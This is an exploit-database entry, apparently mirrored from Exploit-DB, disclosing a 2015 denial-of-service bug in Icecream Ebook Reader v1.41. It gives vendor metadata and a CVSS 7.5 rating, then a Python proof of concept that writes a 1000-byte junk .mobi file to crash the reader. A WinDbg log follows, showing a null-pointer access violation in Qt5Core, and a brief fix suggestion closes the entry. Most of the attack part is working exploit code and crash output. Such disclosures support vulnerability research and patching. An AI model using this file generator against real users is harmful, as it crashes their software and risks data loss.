Icecream Ebook Reader v1.41 (.mobi/.prc) Denial of Service

vendor:

Icecream Ebook Reader

by:

Kapil Soni

7.5

CVSS

HIGH

Memory Corruption Vulnerability

119

CWE

Product Name: Icecream Ebook Reader

Affected Version From: Icecream Ebook Reader v1.41

Affected Version To: Icecream Ebook Reader v1.41

Patch Exists: YES

Related CWE: N/A

CPE: ebookreader

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP2

2015

Icecream Ebook Reader v1.41 (.mobi/.prc) Denial of Service

An attacker can crash the software by using .mobi and .prc file. Attackers can crash the software local by user inter action over .mobi and .prc (ebooks).

Mitigation:

Update to the latest version of Icecream Ebook Reader

Source

Exploit-DB raw data:

# Exploit Title: [Icecream Ebook Reader v1.41 (.mobi/.prc) Denial of Service]
# Date: [23/01/2015]
# Exploit Author: [Kapil Soni]
# Twitter: [@Haxinos]
# Vendor Homepage: [http://icecreamapps.com/]
# Version: [Icecream Ebook Reader v1.41]
# Tested on: [Windows XP SP2]

#Technical Details & Description:
#================================
#A Memory Corruption Vulnerability is detected on Icecream Ebook Reader v1.41. An attacker can crash the software by using .mobi and .prc file.
#Attackers can crash the software local by user inter action over .mobi and .prc (ebooks).


#Piece of Code
#========================================================================

#!/usr/bin/python

buffer = "A"*1000

filename = "crash"+".mobi" # For testing with .prc, change the extension
file = open(filename, 'w')
file.write(buffer)
file.close()

print "File Successfully Created [1]"

#========================================================================
#Debugging and Error Log
#========================

#Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
#Copyright (c) Microsoft Corporation. All rights reserved.
#*** wait with pending attach
#Symbol search path is: *** Invalid ***
#****************************************************************************
#* Symbol loading may be unreliable without a symbol search path.           *
#* Use .symfix to have the debugger choose a symbol path.                   *
#* After setting your symbol path, use .reload to refresh symbol locations. *
#****************************************************************************
#Executable search path is: 
#ModLoad: 00400000 00bd2000   C:\Program Files\Icecream Ebook Reader\ebookreader.exe
#ModLoad: 7c900000 7c9b0000   C:\WINDOWS\system32\ntdll.dll
#ModLoad: 7c800000 7c8f4000   C:\WINDOWS\system32\kernel32.dll
#ModLoad: 67000000 673f1000   C:\Program Files\Icecream Ebook Reader\Qt5Core.dll
#ModLoad: 00d30000 01158000   C:\Program Files\Icecream Ebook Reader\Qt5Gui.dll
#.... Snipped
#ModLoad: 769c0000 76a73000   C:\WINDOWS\system32\userenv.dll
#ModLoad: 01960000 0196c000   C:\Program Files\Icecream Ebook Reader\imageformats\qdds.dll
#ModLoad: 01970000 01979000   C:\Program Files\Icecream Ebook Reader\imageformats\qgif.dll
#ModLoad: 01b10000 01b18000   C:\Program Files\Icecream Ebook Reader\imageformats\qwbmp.dll
#ModLoad: 01b20000 01b66000   C:\Program Files\Icecream Ebook Reader\imageformats\qwebp.dll
#ModLoad: 09e70000 09f0f000   C:\Program Files\Icecream Ebook Reader\sqldrivers\qsqlite.dll
#ModLoad: 20000000 202c5000   C:\WINDOWS\system32\xpsp2res.dll
#(f9c.e34): Break instruction exception - code 80000003 (first chance)
#eax=7ffd7000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
#eip=7c901230 esp=0a67ffcc ebp=0a67fff4 iopl=0         nv up ei pl zr na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000246
#*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll - 
#ntdll!DbgBreakPoint:
#7c901230 cc              int     3
#0:003> g
#ModLoad: 763b0000 763f9000   C:\WINDOWS\system32\Comdlg32.dll
#ModLoad: 77b40000 77b62000   C:\WINDOWS\system32\appHelp.dll
#ModLoad: 76fd0000 7704f000   C:\WINDOWS\system32\CLBCATQ.DLL
#ModLoad: 77050000 77115000   C:\WINDOWS\system32\COMRes.dll
#... Snipped
#ModLoad: 771b0000 77256000   C:\WINDOWS\system32\WININET.dll
#ModLoad: 76f60000 76f8c000   C:\WINDOWS\system32\WLDAP32.dll
#ModLoad: 74e30000 74e9c000   C:\WINDOWS\system32\RichEd20.dll
#ModLoad: 76980000 76988000   C:\WINDOWS\system32\LINKINFO.dll
#QIODevice::read: Called with maxSize < 0
#QIODevice::read: Called with maxSize < 0

#(f9c.998): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=6723d888 ebx=00000000 ecx=00000000 edx=ffffffff esi=0012cd9c edi=0012cf38
#eip=671da2a7 esp=0012cc30 ebp=0012cc90 iopl=0         nv up ei pl nz na pe cy
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010207
#*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Icecream Ebook Reader\Qt5Core.dll - 
#Qt5Core!QTextCodec::toUnicode+0x7:
#671da2a7 8b11            mov     edx,dword ptr [ecx]  ds:0023:00000000=????????

#Exploitation Technique:
#============================
#Local, DoS, Memory Corruption

#Solution - Fix & Patch:
#=======================
#Restrict working maximum size & set a own exception-handling for over-sized requests.

#Author:
#=======
#Kapil Soni (Haxinos)